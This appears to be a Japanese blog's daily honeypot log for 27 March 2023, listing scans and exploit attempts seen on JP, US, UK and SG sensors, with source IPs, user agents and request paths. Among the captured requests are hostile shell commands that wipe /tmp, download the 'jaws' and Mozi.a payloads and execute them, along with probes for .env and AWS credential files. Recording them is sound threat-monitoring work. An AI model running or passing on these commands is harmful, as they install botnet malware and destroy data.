コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/03/27 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/03/27分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

aiohttpによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws
Location:US

D-link製品の脆弱性を狙うアクセス
Drupal脆弱性(CVE-2018-7600)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws
Location:UK

D-link製品の脆弱性を狙うアクセス
Drupal脆弱性(CVE-2018-7600)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
Drupal脆弱性(CVE-2018-7600)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:389 (前日比:55)
US:総アクセス数:126 (前日比:-125)
UK:総アクセス数:130 (前日比:-181)
SG:総アクセス数:91 (前日比:7)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
57 3.88.180.177 United States
1 5.44.107.189 Germany
1 5.252.167.165 United States
18 43.154.141.71 Singapore
127 44.204.245.16 United States
1 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
1 45.79.181.179 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
1 45.81.243.34 Bulgaria
1 45.83.66.221 Germany
1 54.90.145.79 United States
1 54.149.73.163 United States
1 66.115.189.137 United States
48 79.110.62.79 Bulgaria
1 92.118.39.82 Romania
2 94.102.51.9 United Kingdom
1 102.214.19.122 private ip address
1 104.192.0.50 United States
1 104.243.37.125 United States
2 104.248.127.48 United States
1 109.122.221.156 Georgia
2 109.237.97.180 Russia
1 110.77.136.143 Thailand
45 119.29.163.245 China
8 135.125.217.54 France
9 135.125.244.48 France
2 138.68.153.47 United States
5 146.190.108.131 United States
1 162.142.125.11 United States
1 162.243.141.24 United States
1 167.94.138.127 United States
1 167.94.146.60 United States
5 167.99.182.237 United States
1 167.248.133.125 United States
3 172.104.11.51 United States
1 172.105.128.11 United States
1 185.225.74.201 Bulgaria
4 185.254.196.173 Ukraine
7 193.32.162.159 Romania
4 198.20.69.98 United States
10 198.44.136.60 United States
1 205.210.31.141 United States
2 216.218.206.68 United States

UserAgent一覧

件数 UserAgent
66 -
2 Go-http-client/1.1
1 Hello World
2 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
11 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
30 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
127 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
81 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
5 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
10 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 Python-urllib/3.9
2 Python/3.10 aiohttp/3.8.3
1 SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1
2 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x16\x03\x01\x01H\x01
16 \x16\x03\x01
4 GET /.DS_Store HTTP/1.1
1 GET /.__info.php HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.docker/.env HTTP/1.1
1 GET /.docker/laravel/app/.env HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.save HTTP/1.1
1 GET /.env.stage HTTP/1.1
1 GET /.env.www HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.info.php HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /.wp-config.php.swp HTTP/1.1
1 GET //.env HTTP/1.1
1 GET /0.0_phpinfo.php HTTP/1.1
1 GET /00_server_info.php HTTP/1.1
1 GET /02-info.php HTTP/1.1
1 GET /1_1_PhpInfo.php HTTP/1.1
4 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /5info.php HTTP/1.1
1 GET /?phpinfo=-1 HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /AwsConfig.json HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /__info.php HTTP/1.1
1 GET /_info-backoffice.php HTTP/1.1
1 GET /_info.php HTTP/1.1
4 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpinf.php HTTP/1.1
2 GET /_phpinfo.php HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /_poopinfo.php HTTP/1.1
3 GET /_profiler/phpinfo HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /admin/dashboard/info.php HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpinfo.php HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
3 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /api/phpinfo.php HTTP/1.1
1 GET /api/src HTTP/1.1
1 GET /apis/apps/v1/namespaces/kube-system/daemonsets HTTP/1.1
1 GET /aws.json HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /awsconfig.json HTTP/1.1
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /check.php HTTP/1.1
2 GET /client/get_targets HTTP/1.1
2 GET /config.js HTTP/1.1
2 GET /config.json HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /configuration.php HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /dashboard/test.php HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
2 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
2 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
3 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /db/webadmin/index.php?lang=en HTTP/1.1
2 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /debug/default/view.html HTTP/1.1
2 GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1
2 GET /debug/default/view?panel=config HTTP/1.1
2 GET /debug/default/view HTTP/1.1
1 GET /debug/default HTTP/1.1
1 GET /develop/info.php HTTP/1.1
7 GET /dispatch.asp HTTP/1.1
1 GET /druid/index.html HTTP/1.1
9 GET /favicon.ico HTTP/1.1
2 GET /frontend/web/debug/default/view HTTP/1.1
3 GET /frontend_dev.php/$ HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /html/phpinfo.php HTTP/1.1
1 GET /i.php HTTP/1.1
1 GET /index.js HTTP/1.1
1 GET /index.php HTTP/1.1
3 GET /info.php HTTP/1.1
1 GET /info/phpinfo.php HTTP/1.1
1 GET /info1.php HTTP/1.1
1 GET /local-phpinfo.php HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
2 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
2 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /p.php HTTP/1.1
1 GET /php-info.php HTTP/1.1
1 GET /php-info HTTP/1.1
2 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php.php HTTP/1.1
1 GET /php/phpinfo.php HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1
5 GET /phpMyAdmin-5.3.0-all-languages/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.3.0/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-latest-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
3 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /php_info.php HTTP/1.1
3 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo/phpinfo.php HTTP/1.1
3 GET /phpinfo HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
2 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /phptest.php HTTP/1.1
1 GET /pi.php HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /root/infophp HTTP/1.1
2 GET /sapi/debug/default/view HTTP/1.1
1 GET /server/phpinfo.php HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /sql/myadmin/index.php?lang=en HTTP/1.1
2 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
3 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
2 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /symfony/public/_profiler/phpinfo HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /temp.php HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /test1.php HTTP/1.1
1 GET /test2.php HTTP/1.1
1 GET /testing.php HTTP/1.1
1 GET /testphpinfo HTTP/1.1
1 GET /tool/view/phpinfo.view.php HTTP/1.1
1 GET /tools/info.php HTTP/1.1
2 GET /upl.php HTTP/1.1
1 GET /v3/time HTTP/1.1
2 GET /web/debug/default/view HTTP/1.1
1 GET /wp-config.backup HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php HTTP/1.0
18 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
3 45.33.80.243 United States
1 45.79.128.205 United States
1 45.79.181.179 United States
3 45.79.181.223 United States
1 45.81.243.34 Bulgaria
1 45.83.67.60 Germany
1 45.128.232.149 Bulgaria
1 45.145.248.50 Netherlands
23 51.79.29.48 Canada
1 54.37.79.75 France
1 64.62.197.97 United States
1 64.62.197.100 United States
1 66.115.189.137 United States
1 67.21.36.5 United States
4 80.82.77.33 United Kingdom
1 91.191.209.202 Bulgaria
1 92.118.39.82 Romania
1 94.102.51.9 United Kingdom
6 95.214.235.216 Ukraine
1 101.36.107.222 Hong Kong
1 104.236.128.9 United States
2 104.248.229.49 United States
1 107.170.232.14 United States
1 109.94.76.22 Russia
2 109.237.97.180 Russia
3 124.156.223.178 Singapore
5 146.190.108.131 United States
2 146.190.154.101 United States
1 147.78.103.91 Bulgaria
2 152.89.196.54 Russia
2 162.142.125.214 United States
1 167.71.24.176 United States
5 167.99.182.237 United States
6 167.172.224.104 United States
1 172.104.11.4 United States
2 172.104.11.34 United States
1 172.105.128.13 United States
2 179.43.177.242 Panama
1 180.228.160.196 South Korea
1 185.225.74.42 Bulgaria
1 185.225.74.201 Bulgaria
6 185.246.221.75 Bulgaria
8 185.254.196.223 Ukraine
1 190.211.252.122 Panama
10 193.32.162.159 Romania
1 194.55.224.203 Bulgaria
1 203.115.85.245 India
1 209.141.36.231 United States
1 220.134.74.111 Taiwan

UserAgent一覧

件数 UserAgent
30 -
1 Hello World
3 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
6 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; ARM; Lumia 950 Dual SIM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
5 Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
39 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
5 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 axios/1.3.4
1 python-requests/2.22.0
1 xxx

リクエスト内容一覧

件数 Method Request Protocol
3 -
1 MGLNDD_34.68.118.83_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
16 \x16\x03\x01
1 \xff\xa2\xff
1 o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f
1 CONNECT pro.ip-api[.]com:443 HTTP/1.1
40 GET /.env HTTP/1.1
1 GET /.flaskenv HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET //config/config.js HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
3 GET /_profiler/phpinfo HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /apis/apps/v1/namespaces/kube-system/daemonsets HTTP/1.1
1 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /config.inc.php HTTP/1.1
1 GET /config/config.json HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /dev/phpinfo.php HTTP/1.1
1 GET /dev/phpinfo HTTP/1.1
10 GET /dispatch.asp HTTP/1.1
1 GET /druid/index.html HTTP/1.1
7 GET /favicon.ico HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /server-info HTTP/1.1
3 GET /shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /upl.php HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/v0/id HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.95.223.114 United States
1 20.168.255.151 United States
33 45.32.239.166 United States
2 45.33.80.243 United States
2 45.79.128.205 United States
1 45.79.181.223 United States
1 45.81.243.3 Bulgaria
1 45.81.243.34 Bulgaria
1 45.128.232.149 Bulgaria
1 45.145.248.50 Netherlands
23 51.79.29.48 Canada
1 54.37.79.75 France
4 80.82.77.139 United Kingdom
1 91.191.209.202 Bulgaria
1 92.118.39.82 Romania
1 94.102.51.9 United Kingdom
6 95.214.235.216 Ukraine
1 107.170.192.8 United States
1 115.50.45.1 China
1 140.99.219.26 United States
2 146.190.166.168 United States
1 147.78.103.91 Bulgaria
2 152.89.196.54 Russia
5 159.89.116.111 United States
2 159.223.196.115 United States
2 167.94.145.58 United States
2 167.248.133.191 United States
2 172.104.11.34 United States
1 172.105.77.209 United States
3 179.43.177.242 Panama
8 185.254.196.223 Ukraine
3 192.155.90.118 United States
2 192.155.90.220 United States
1 192.241.224.9 United States
6 193.32.162.159 Romania
1 194.87.151.116 Czechia
1 205.210.31.151 United States
